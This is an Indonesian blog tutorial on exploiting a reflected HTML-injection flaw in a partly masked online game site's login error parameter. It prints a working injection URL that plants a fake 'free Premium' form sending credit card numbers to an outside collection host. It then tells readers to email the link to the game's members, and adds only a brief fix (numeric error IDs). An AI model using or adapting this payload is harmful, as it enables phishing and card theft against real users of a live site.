Setelah meminta bantuan Om Google untuk mencarikan korban (dengan berbagai Query) akhirnya ketemu juga sebuah website yang bisa dipakai buat dijadiin korban, yaitu website game online ***CE*K.
Nah, kali ini, saya ingin menunjukan Studi Kasus yaitu mendeface website tersebut tanpa merusaknya. Trus untuk apa donk klo gak ngerusak? Nah ntar saya jelasin untuk apa… Tenang aja dulu -.-’
Sekarang, kita buka dulu website korban…
Nah, setelah login, saya akan login secara amburadul, sembarang aja, yang penting kita lihat hasil errornya…
Ok, klik Login… Dan… Wow!!! Ternyata…. salah…
Tapi, seperti yang saya bilang tadi, kita bukan nyari salah atau benarnya (sebenarnya sih, kita nyari salah…), yang penting hasilnya! Dan hasilnya…
Terlihat bahwa sang programmer cukup “malas” dalam membuat pesan errornya satu persatu, tergantung dari kesalahannya. Jadinya yagh, dia pake $_GET untuk menaruh tulisan Errornya. Sekilas ini tidak apa – apa, tapi klo benar – benar diperhatikan, ini sangat berbahaya! Karena kita bisa dengan mudah memodifikasi tulisannya, bahkan memasukkan script jahat…
Nah lo… Bener kan? Tapi… tapi… kan gak permanen, klo dimasukin script jahat, tapi gak permanen, kan sama aja toh… Nah, tapi bukan disitu permasalahannya… Tapi, kita bisa saja memasukkan sebuah form untuk mencuri Kartu Kredit. Caranya? Ya, kita masukkan lewat error=nya, trus kita copy, dan kirim ke E-mail orang (Baca: Membernya). Secara otomatis, karena keliatan linknya dari website yang “terpercaya”, mereka masuk kesana, dan nyoba aja masukin kartu kredit…
Eits, tapi sebelum memasukkan script jahat, kita harus liat dulu sourcenya, supaya gak salah…
Nah, kita lihat dulu sourcenya…
Nah, terlihat bahwa kode kita dimasukkan masih diantara <form> dan </form>. Tentu saja kita tidak bisa membuat form yang bersangkar. Maka dari itu, kita harus menutup dulu formnya, dengan mengawali kode kita dengan </form>. Tapi, karena ada satu penutup </form> yang gak kepake lagi (Yang udah ada dari tadi), kita bisa pakai buat nutupin form buatan kita! Sehingga, kita bisa menggunakan script seperti ini:http://***ce*k.com/*****/login.php?ln=sembarang&error=</form><form method=post action=http://www.ambilkartukredit.com/ambil.php>Want to become Premium? Free! Just give your credit card number: <input type=input name=creditcard/><input type=submit value=Premium! name=submit/>
Ingat bahwa kita tidak bisa memakai ‘ dan ” pada kode, karena akan mengakibatkan error. Maka dari itu, NAME dari setiap kontrol bisa berbeda dengan apa yang kita tulis. Maka dari itu, kita harus menggunakan Add-Ons Tamper Data pada Firefox untuk melihat apa name dari setiap kontrolnya setelah di-deface…
Nah, trus apa selanjutnya? Kita tinggal kirimkan link tersebut lewat E-mail (atau lainnya) ke para Member/Player Game Online tersebut, sehingga bila ada yang tertipu, kita bisa mendapatkan Kartu Kredit tersebut.
Trus, gimana pencegahannya? Gampang! Supaya web kita tidak bisa di-deface, usahakan JANGAN MENARUH APA YANG KITA INGIN TULIS/PESAN KITA LEWAT $_GET/URL, atau anda bisa mengikuti cara – cara banyak web, yaitu dengan menggunakan error=id (id adalah id pesan error). Jadi, misalnya kita buat klo error=1, hasilnya Wrong Password, klo error=2, hasilnya Wrong Username, klo error=3, hasilnya Account Blocked, dsb.
Selamat Defacing!
Cophyright © Ilmu Pelajar_www.Ilmu-pelajar.co.cc™
0 komentar:
Posting Komentar